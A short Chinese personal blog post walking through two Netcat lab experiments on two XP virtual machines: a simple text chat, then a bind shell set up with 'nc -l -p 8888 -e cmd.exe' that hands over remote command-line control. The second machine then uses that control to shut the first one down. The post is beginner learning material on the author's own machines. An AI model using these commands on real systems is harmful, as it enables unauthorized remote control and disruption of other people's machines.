好可惜前幾日才接觸Netcat，聽(tīng)聞Netcat有“瑞士軍刀”之美稱，出于好奇，做Netcat實(shí)驗(yàn)兩個(gè)：

1.使用Netcat監(jiān)聽(tīng)端口充當(dāng)SERVER和作為CLIENT連接目標(biāo)主機(jī)指定端口

2.通過(guò)Netcat獲取對(duì)另一臺(tái)機(jī)的控制權(quán)

都是在兩臺(tái)XP虛擬機(jī)中進(jìn)行的，分享于此。

前提準(zhǔn)備

1.XP虛擬機(jī)兩臺(tái)，作為測(cè)試機(jī)使用

2.下載Netcat1.11，解壓至測(cè)試機(jī)目標(biāo)文件夾C:\tool\netcat-1.11（兩臺(tái)均是）

3.關(guān)閉操作系統(tǒng)防火請(qǐng)，設(shè)置兩臺(tái)測(cè)試機(jī)在同一網(wǎng)段內(nèi)（方便測(cè)試），查看并記錄兩臺(tái)機(jī)的ip地址，分別為192.168.82.229和192.168.82.146

實(shí)驗(yàn)一、使用NC監(jiān)聽(tīng)端口充當(dāng)SERVER和作為CLIENT連接目標(biāo)主機(jī)指定端口

1.在一臺(tái)測(cè)試機(jī)（192.168.82.229）中命令行輸入：cd C:\tool\netcat-1.11\ ，進(jìn)入nc所在目錄

2.繼續(xù)在命令行輸入：nc -l -p 8888，則開(kāi)始監(jiān)聽(tīng)本機(jī)8888端口，等待client連接，可以認(rèn)為已經(jīng)開(kāi)啟server

3.在另一臺(tái)機(jī)（192.168.82.146）命令行輸入：cd C:\tool\netcat-1.11\，進(jìn)入nc所在目錄

4.在命令行中繼續(xù)輸入：nc 192.168.82.229 8888，此處為server的ip地址和正在通過(guò)nc監(jiān)聽(tīng)的端口

5.連接成功，此時(shí)在兩臺(tái)機(jī)的命令行窗口中光標(biāo)均在新行行首，可以輸入文本，在一臺(tái)機(jī)的當(dāng)前命令行窗口中輸入文本回車后可以顯示在另一臺(tái)機(jī)的當(dāng)前命令行窗口中，模擬了簡(jiǎn)單的聊天動(dòng)作。

實(shí)驗(yàn)二、通過(guò)NC獲取對(duì)另一臺(tái)機(jī)的控制權(quán)

1.在一臺(tái)機(jī)（192.168.82.229）命令行窗口進(jìn)入nc程序目錄，輸入：nc -l -p 8888 -e C:\WINDOWS\system32\cmd.exe，則開(kāi)啟了8888端口的監(jiān)聽(tīng)服務(wù)，等待client連接后就會(huì)將cmd.exe的執(zhí)行權(quán)發(fā)給client

2.在另一臺(tái)機(jī)（192.168.82.146）命令行窗口進(jìn)入nc程序目錄，輸入：nc 192.168.82.229 8888，即可連接至server，并獲得了對(duì)server的cmd.exe程序的使用權(quán)，幾乎相當(dāng)于獲得了對(duì)server整機(jī)的控制權(quán)。在命令行窗口繼續(xù)輸入：shutdown -s -t 0，server則會(huì)立即關(guān)機(jī)。

全文引自個(gè)人博客——云影時(shí)空，原文地址： http://www.zhengjie.ren/nctest2/